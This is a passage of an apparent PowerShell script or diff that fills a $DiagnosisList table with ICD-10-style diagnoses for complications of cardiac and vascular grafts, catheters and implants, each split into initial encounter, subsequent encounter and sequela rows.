= $DiagnosisList.Rows.Add("Breakdown (mechanical) of aortic (bifurcation) graft (replacement)","Breakdown (mechanical) of aortic (bifurcation) graft (replacement), sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of carotid arterial graft (bypass)","Breakdown (mechanical) of carotid arterial graft (bypass), initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of carotid arterial graft (bypass)","Breakdown (mechanical) of carotid arterial graft (bypass), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of carotid arterial graft (bypass)","Breakdown (mechanical) of carotid arterial graft (bypass), sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of femoral arterial graft (bypass)","Breakdown (mechanical) of femoral arterial graft (bypass), initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of femoral arterial graft (bypass)","Breakdown (mechanical) of femoral arterial graft (bypass), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of femoral arterial graft (bypass)","Breakdown (mechanical) of femoral arterial graft (bypass), sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other vascular grafts","Breakdown (mechanical) of other vascular grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other vascular grafts","Breakdown (mechanical) of other vascular grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other vascular grafts","Breakdown (mechanical) of other vascular grafts, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of unspecified vascular grafts","Breakdown (mechanical) of unspecified vascular grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of unspecified vascular grafts","Breakdown (mechanical) of unspecified vascular grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of unspecified vascular grafts","Breakdown (mechanical) of unspecified vascular grafts, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of aortic (bifurcation) graft (replacement)","Displacement of aortic (bifurcation) graft (replacement), initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of aortic (bifurcation) graft (replacement)","Displacement of aortic (bifurcation) graft (replacement), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of aortic (bifurcation) graft (replacement)","Displacement of aortic (bifurcation) graft (replacement), sequela") + $null = $DiagnosisList.Rows.Add("Displacement of carotid arterial graft (bypass)","Displacement of carotid arterial graft (bypass), initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of carotid arterial graft (bypass)","Displacement of carotid arterial graft (bypass), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of carotid arterial graft (bypass)","Displacement of carotid arterial graft (bypass), sequela") + $null = $DiagnosisList.Rows.Add("Displacement of femoral arterial graft (bypass)","Displacement of femoral arterial graft (bypass), initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of femoral arterial graft (bypass)","Displacement of femoral arterial graft (bypass), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of femoral arterial graft (bypass)","Displacement of femoral arterial graft (bypass), sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other vascular grafts","Displacement of other vascular grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other vascular grafts","Displacement of other vascular grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other vascular grafts","Displacement of other vascular grafts, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of unspecified vascular grafts","Displacement of unspecified vascular grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of unspecified vascular grafts","Displacement of unspecified vascular grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of unspecified vascular grafts","Displacement of unspecified vascular grafts, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of aortic (bifurcation) graft (replacement)","Leakage of aortic (bifurcation) graft (replacement), initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of aortic (bifurcation) graft (replacement)","Leakage of aortic (bifurcation) graft (replacement), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of aortic (bifurcation) graft (replacement)","Leakage of aortic (bifurcation) graft (replacement), sequela") + $null = $DiagnosisList.Rows.Add("Leakage of carotid arterial graft (bypass)","Leakage of carotid arterial graft (bypass), initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of carotid arterial graft (bypass)","Leakage of carotid arterial graft (bypass), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of carotid arterial graft (bypass)","Leakage of carotid arterial graft (bypass), sequela") + $null = $DiagnosisList.Rows.Add("Leakage of femoral arterial graft (bypass)","Leakage of femoral arterial graft (bypass), initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of femoral arterial graft (bypass)","Leakage of femoral arterial graft (bypass), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of femoral arterial graft (bypass)","Leakage of femoral arterial graft (bypass), sequela") + $null = $DiagnosisList.Rows.Add("Leakage of other vascular grafts","Leakage of other vascular grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of other vascular grafts","Leakage of other vascular grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of other vascular grafts","Leakage of other vascular grafts, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of unspecified vascular graft","Leakage of unspecified vascular graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of unspecified vascular graft","Leakage of unspecified vascular graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of unspecified vascular graft","Leakage of unspecified vascular graft, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of aortic (bifurcation) graft (replacement)","Other mechanical complication of aortic (bifurcation) graft (replacement), initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of aortic (bifurcation) graft (replacement)","Other mechanical complication of aortic (bifurcation) graft (replacement), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of aortic (bifurcation) graft (replacement)","Other mechanical complication of aortic (bifurcation) graft (replacement), sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of carotid arterial graft (bypass)","Other mechanical complication of carotid arterial graft (bypass), initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of carotid arterial graft (bypass)","Other mechanical complication of carotid arterial graft (bypass), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of carotid arterial graft (bypass)","Other mechanical complication of carotid arterial graft (bypass), sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of femoral arterial graft (bypass)","Other mechanical complication of femoral arterial graft (bypass), initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of femoral arterial graft (bypass)","Other mechanical complication of femoral arterial graft (bypass), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of femoral arterial graft (bypass)","Other mechanical complication of femoral arterial graft (bypass), sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other vascular grafts","Other mechanical complication of other vascular grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other vascular grafts","Other mechanical complication of other vascular grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other vascular grafts","Other mechanical complication of other vascular grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified vascular grafts","Other mechanical complication of unspecified vascular grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified vascular grafts","Other mechanical complication of unspecified vascular grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified vascular grafts","Other mechanical complication of unspecified vascular grafts, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of vascular dialysis catheter","Breakdown (mechanical) of vascular dialysis catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of vascular dialysis catheter","Breakdown (mechanical) of vascular dialysis catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of vascular dialysis catheter","Breakdown (mechanical) of vascular dialysis catheter, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of vascular dialysis catheter","Displacement of vascular dialysis catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of vascular dialysis catheter","Displacement of vascular dialysis catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of vascular dialysis catheter","Displacement of vascular dialysis catheter, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of vascular dialysis catheter","Leakage of vascular dialysis catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of vascular dialysis catheter","Leakage of vascular dialysis catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of vascular dialysis catheter","Leakage of vascular dialysis catheter, sequela") + $null = $DiagnosisList.Rows.Add("Other complication of vascular dialysis catheter","Other complication of vascular dialysis catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complication of vascular dialysis catheter","Other complication of vascular dialysis catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complication of vascular dialysis catheter","Other complication of vascular dialysis catheter, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of surgically created arteriovenous fistula","Breakdown (mechanical) of surgically created arteriovenous fistula, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of surgically created arteriovenous fistula","Breakdown (mechanical) of surgically created arteriovenous fistula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of surgically created arteriovenous fistula","Breakdown (mechanical) of surgically created arteriovenous fistula, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of surgically created arteriovenous shunt","Breakdown (mechanical) of surgically created arteriovenous shunt, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of surgically created arteriovenous shunt","Breakdown (mechanical) of surgically created arteriovenous shunt, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of surgically created arteriovenous shunt","Breakdown (mechanical) of surgically created arteriovenous shunt, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of artificial heart","Breakdown (mechanical) of artificial heart, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of artificial heart","Breakdown (mechanical) of artificial heart, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of artificial heart","Breakdown (mechanical) of artificial heart, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of balloon (counterpulsation) device","Breakdown (mechanical) of balloon (counterpulsation) device, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of balloon (counterpulsation) device","Breakdown (mechanical) of balloon (counterpulsation) device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of balloon (counterpulsation) device","Breakdown (mechanical) of balloon (counterpulsation) device, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of infusion catheter","Breakdown (mechanical) of infusion catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of infusion catheter","Breakdown (mechanical) of infusion catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of infusion catheter","Breakdown (mechanical) of infusion catheter, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of umbrella device","Breakdown (mechanical) of umbrella device, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of umbrella device","Breakdown (mechanical) of umbrella device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of umbrella device","Breakdown (mechanical) of umbrella device, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other cardiac and vascular devices and implants","Breakdown (mechanical) of other cardiac and vascular devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other cardiac and vascular devices and implants","Breakdown (mechanical) of other cardiac and vascular devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other cardiac and vascular devices and implants","Breakdown (mechanical) of other cardiac and vascular devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of unspecified cardiac and vascular devices and implants","Breakdown (mechanical) of unspecified cardiac and vascular devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of unspecified cardiac and vascular devices and implants","Breakdown (mechanical) of unspecified cardiac and vascular devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of unspecified cardiac and vascular devices and implants","Breakdown (mechanical) of unspecified cardiac and vascular devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of surgically created arteriovenous fistula","Displacement of surgically created arteriovenous fistula, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of surgically created arteriovenous fistula","Displacement of surgically created arteriovenous fistula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of surgically created arteriovenous fistula","Displacement of surgically created arteriovenous fistula, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of surgically created arteriovenous shunt","Displacement of surgically created arteriovenous shunt, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of surgically created arteriovenous shunt","Displacement of surgically created arteriovenous shunt, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of surgically created arteriovenous shunt","Displacement of surgically created arteriovenous shunt, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of artificial heart","Displacement of artificial heart, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of artificial heart","Displacement of artificial heart, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of artificial heart","Displacement of artificial heart, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of balloon (counterpulsation) device","Displacement of balloon (counterpulsation) device, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of balloon (counterpulsation) device","Displacement of balloon (counterpulsation) device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of balloon (counterpulsation) device","Displacement of balloon (counterpulsation) device, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of infusion catheter","Displacement of infusion catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of infusion catheter","Displacement of infusion catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of infusion catheter","Displacement of infusion catheter, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of umbrella device","Displacement of umbrella device, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of umbrella device","Displacement of umbrella device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of umbrella device","Displacement of umbrella device, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other cardiac and vascular devices and implants","Displacement of other cardiac and vascular devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other cardiac and vascular devices and implants","Displacement of other cardiac and vascular devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other cardiac and vascular devices and implants","Displacement of other cardiac and vascular devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of unspecified cardiac and vascular devices and implants","Displacement of unspecified cardiac and vascular devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of unspecified cardiac and vascular devices and implants","Displacement of unspecified cardiac and vascular devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of unspecified cardiac and vascular devices and implants","Displacement of unspecified cardiac and vascular devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of surgically created arteriovenous fistula","Leakage of surgically created arteriovenous fistula, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of surgically created arteriovenous fistula","Leakage of surgically created arteriovenous fistula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of surgically created arteriovenous fistula","Leakage of surgically created arteriovenous fistula, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of surgically created arteriovenous shunt","Leakage of surgically created arteriovenous shunt, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of surgically created arteriovenous shunt","Leakage of surgically created arteriovenous shunt, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of surgically created arteriovenous shunt","Leakage of surgically created arteriovenous shunt, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of artificial heart","Leakage of artificial heart, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of artificial heart","Leakage of artificial heart, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of artificial heart","Leakage of artificial heart, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of balloon (counterpulsation) device","Leakage of balloon (counterpulsation) device, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of balloon (counterpulsation) device","Leakage of balloon (counterpulsation) device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of balloon (counterpulsation) device","Leakage of balloon (counterpulsation) device, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of infusion catheter","Leakage of infusion catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of infusion catheter","Leakage of infusion catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of infusion catheter","Leakage of infusion catheter, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of umbrella device","Leakage of umbrella device, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of umbrella device","Leakage of umbrella device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of umbrella device","Leakage of umbrella device, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of other cardiac and vascular devices and implants","Leakage of other cardiac and vascular devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of other cardiac and vascular devices and implants","Leakage of other cardiac and vascular devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of other cardiac and vascular devices and implants","Leakage of other cardiac and vascular devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of unspecified cardiac and vascular devices and implants","Leakage of unspecified cardiac and vascular devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of unspecified cardiac and vascular devices and implants","Leakage of unspecified cardiac and vascular devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of unspecified cardiac and vascular devices and implants","Leakage of unspecified cardiac and vascular devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of surgically created arteriovenous fistula","Other mechanical complication of surgically created arteriovenous fistula, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of surgically created arteriovenous fistula","Other mechanical complication of surgically created arteriovenous fistula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of surgically created arteriovenous fistula","Other mechanical complication of surgically created arteriovenous fistula, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of surgically created arteriovenous shunt","Other mechanical complication of surgically created arteriovenous shunt, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of surgically created arteriovenous shunt","Other mechanical complication of surgically created arteriovenous shunt, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of surgically created arteriovenous shunt","Other mechanical complication of surgically created arteriovenous shunt, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of artificial heart","Other mechanical complication of artificial heart, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of artificial heart","Other mechanical complication of artificial heart, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of artificial heart","Other mechanical complication of artificial heart, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of balloon (counterpulsation) device","Other mechanical complication of balloon (counterpulsation) device, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of balloon (counterpulsation) device","Other mechanical complication of balloon (counterpulsation) device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of balloon (counterpulsation) device","Other mechanical complication of balloon (counterpulsation) device, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of infusion catheter","Other mechanical complication of infusion catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of infusion catheter","Other mechanical complication of infusion catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of infusion catheter","Other mechanical complication of infusion catheter, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of umbrella device","Other mechanical complication of umbrella device, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of umbrella device","Other mechanical complication of umbrella device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of umbrella device","Other mechanical complication of umbrella device, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other cardiac and vascular devices and implants","Other mechanical complication of other cardiac and vascular devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other cardiac and vascular devices and implants","Other mechanical complication of other cardiac and vascular devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other cardiac and vascular devices and implants","Other mechanical complication of other cardiac and vascular devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified cardiac and vascular devices and implants","Other mechanical complication of unspecified cardiac and vascular devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified cardiac and vascular devices and implants","Other mechanical complication of unspecified cardiac and vascular devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified cardiac and vascular devices and implants","Other mechanical complication of unspecified cardiac and vascular devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to cardiac valve prosthesis","Infection and inflammatory reaction due to cardiac valve prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to cardiac valve prosthesis","Infection and inflammatory reaction due to cardiac valve prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to cardiac valve prosthesis","Infection and inflammatory reaction due to cardiac valve prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other cardiac and vascular devices, implants and grafts","Infection and inflammatory reaction due to other cardiac and vascular devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other cardiac and vascular devices, implants and grafts","Infection and inflammatory reaction due to other cardiac and vascular devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other cardiac and vascular devices, implants and grafts","Infection and inflammatory reaction due to other cardiac and vascular devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Embolism due to cardiac prosthetic devices, implants and grafts","Embolism due to cardiac prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to cardiac prosthetic devices, implants and grafts","Embolism due to cardiac prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to cardiac prosthetic devices, implants and grafts","Embolism due to cardiac prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Embolism due to vascular prosthetic devices, implants and grafts","Embolism due to vascular prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to vascular prosthetic devices, implants and grafts","Embolism due to vascular prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to vascular prosthetic devices, implants and grafts","Embolism due to vascular prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Fibrosis due to cardiac prosthetic devices, implants and grafts","Fibrosis due to cardiac prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to cardiac prosthetic devices, implants and grafts","Fibrosis due to cardiac prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to cardiac prosthetic devices, implants and grafts","Fibrosis due to cardiac prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Fibrosis due to vascular prosthetic devices, implants and grafts","Fibrosis due to vascular prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to vascular prosthetic devices, implants and grafts","Fibrosis due to vascular prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to vascular prosthetic devices, implants and grafts","Fibrosis due to vascular prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to cardiac prosthetic devices, implants and grafts","Hemorrhage due to cardiac prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to cardiac prosthetic devices, implants and grafts","Hemorrhage due to cardiac prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to cardiac prosthetic devices, implants and grafts","Hemorrhage due to cardiac prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to vascular prosthetic devices, implants and grafts","Hemorrhage due to vascular prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to vascular prosthetic devices, implants and grafts","Hemorrhage due to vascular prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to vascular prosthetic devices, implants and grafts","Hemorrhage due to vascular prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Pain due to cardiac prosthetic devices, implants and grafts","Pain due to cardiac prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Pain due to cardiac prosthetic devices, implants and grafts","Pain due to cardiac prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pain due to cardiac prosthetic devices, implants and grafts","Pain due to cardiac prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Pain due to vascular prosthetic devices, implants and grafts","Pain due to vascular prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Pain due to vascular prosthetic devices, implants and grafts","Pain due to vascular prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pain due to vascular prosthetic devices, implants and grafts","Pain due to vascular prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Stenosis of coronary artery stent","Stenosis of coronary artery stent, initial encounter") + $null = $DiagnosisList.Rows.Add("Stenosis of coronary artery stent","Stenosis of coronary artery stent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Stenosis of coronary artery stent","Stenosis of coronary artery stent, sequela") + $null = $DiagnosisList.Rows.Add("Stenosis of peripheral vascular stent","Stenosis of peripheral vascular stent, initial encounter") + $null = $DiagnosisList.Rows.Add("Stenosis of peripheral vascular stent","Stenosis of peripheral vascular stent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Stenosis of peripheral vascular stent","Stenosis of peripheral vascular stent, sequela") + $null = $DiagnosisList.Rows.Add("Stenosis of other cardiac prosthetic devices, implants and grafts","Stenosis of other cardiac prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Stenosis of other cardiac prosthetic devices, implants and grafts","Stenosis of other cardiac prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Stenosis of other cardiac prosthetic devices, implants and grafts","Stenosis of other cardiac prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Stenosis of other vascular prosthetic devices, implants and grafts","Stenosis of other vascular prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Stenosis of other vascular prosthetic devices, implants and grafts","Stenosis of other vascular prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Stenosis of other vascular prosthetic devices, implants and grafts","Stenosis of other vascular prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Thrombosis due to cardiac prosthetic devices, implants and grafts","Thrombosis due to cardiac prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to cardiac prosthetic devices, implants and grafts","Thrombosis due to cardiac prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to cardiac prosthetic devices, implants and grafts","Thrombosis due to cardiac prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Thrombosis due to vascular prosthetic devices, implants and grafts","Thrombosis due to vascular prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to vascular prosthetic devices, implants and grafts","Thrombosis due to vascular prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to vascular prosthetic devices, implants and grafts","Thrombosis due to vascular prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other specified complication of cardiac prosthetic devices, implants and grafts","Other specified complication of cardiac prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of cardiac prosthetic devices, implants and grafts","Other specified complication of cardiac prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of cardiac prosthetic devices, implants and grafts","Other specified complication of cardiac prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other specified complication of vascular prosthetic devices, implants and grafts","Other specified complication of vascular prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of vascular prosthetic devices, implants and grafts","Other specified complication of vascular prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of vascular prosthetic devices, implants and grafts","Other specified complication of vascular prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of cardiac and vascular prosthetic device, implant and graft","Unspecified complication of cardiac and vascular prosthetic device, implant and graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of cardiac and vascular 